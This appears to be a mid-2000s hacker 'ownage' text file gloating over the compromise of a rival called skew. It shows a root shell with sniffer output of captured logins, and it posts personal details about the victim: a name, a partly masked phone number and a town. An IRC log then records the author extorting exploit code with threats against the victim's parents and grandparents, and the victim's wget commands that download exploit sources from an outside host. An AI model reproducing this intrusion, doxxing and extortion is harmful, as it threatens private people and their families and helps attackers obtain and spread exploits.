AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU= [root@knysna root]# cd /var /run [root@knysna run]# ./ma sshd.sync 2to: 127.0.0.1 user: ls pass: ss 2to: 127.0.0.1 user: ls pass: s 2to: 127.0.0.1 user: ls pass: s [root@knysna run]# cat /etc/hosts 127.0.0.1localhost [root@knysna run]# logout =========================================== > From these shells we notice a few things: 1: that tal0n sets up ssheist (his ssh sniffer) 2: he usually makes an dir /.../ in /tmp/ so if you have something like /tmp/.../ you have been owned by skew. but thats fucking impossible unless youre a complete dumbshit. 3: skew cant hack. ============================================ [5] GET SKEWS DOCS ;) 1-304-475-**** skew = Jeremy Brown Jerry F Colegrove - (304) 475-**** - , Lenore, WV 25676 [6] MAKE HIM HAND HIS CODE OVER :D 00:50 so you want peace. 00:51 yes 00:51 thats all i ever wanted 00:51 we want some code. 00:51 in exchange. 00:51 0day code. 00:51 as a peace offering. 00:51 and in return, no one else will hassle you/your parents/your grand parents 00:51 i dont have much.. a few things ive coded 00:51 will that be sufficent? 00:51 well, hook up. 00:52 it should, yes, as long as its all good 00:52 hold 00:52 its what i coded, what i got heh 00:52 dcc? 00:52 er 00:52 hold ill give u www 00:53 alright. 00:53 although i would prefer dcc. 00:53 dcc is fucked here router sucks sorry 00:54 wget http://skew.blackhat.ru/oboom.c 00:54 alright. 00:55 as far as 0day, thats what i got 00:55 i code private things from pub advs alot 00:56 but you said 0day so thats all ive written atm 00:56 well, hook up. 00:56 private is close. 00:56 ok 00:56 do you still run skewtty.dyndns.org? 00:57 nope 00:57 2 private exploits. and then an apology, a PUBLIC apology on your website, to xtix. 00:57 well, issue a public apology on blackhat.ru. 00:57 wget http://skew.blackhat.ru/shoutdead.c 00:57 wget http://skew.blackhat.ru/imap4life.pl 00:57 shoutdead is old. 00:58 hrm 00:59 wget http://skew.blackhat.ru/gotfault-newspost.c 00:59 alright, its cool. but the last part now. [7] State a public appology to a freind. 00:57 a PUBLIC apology on your website, to xtix. 01:03 paste the link to apology in #darpa on here 01:03 #phrack and #darknet at efnet. 01:05 * #phrack :Nick/channel is temporarily unavailable Jul 07 02:06:44 --> You are now talking on #darknet Jul 07 02:06:45 --- Topic for #darknet is love everyone, don't be under the influence of the Illuminati and have hate and ware in mind,Ocultism is a form of 'maya Jul 07 02:06:45 --- Topic for #darknet set by SoftIce!awk@hella.secret at Wed Jul 06 07:10:35 2005 Jul 07 02:06:52 http://skew.blackhat.ru/news.html Jul 07 02:06:54 <-- skew has quit (Client Quit) Jul 07 01:14:11 --> You are now talking on #darpa Jul 07 01:14:11 --- Topic for #darpa is skew... ew Jul 07 01:14:11 --- Topic for #darpa set by camel at Wed Jul 06 17:52:55 2005 Jul 07 02:05:05 http://skew.blackhat.ru/news.html Jul 07 02:10:25 <-- skew has quit (Quit: nite *) ================ EOF ========================================================================================= I hope skew has learned from all of this not to talk shit about people dont fuck over youre freinds (you know how it feels now.) stop coding shit, stop the lies admit youre tal0n and dont think you are better than people. you are not. NEWS: skew has changed nicks once again but.... ill let you find him youre self its as easy as eating bread. ;) =============================================================================================================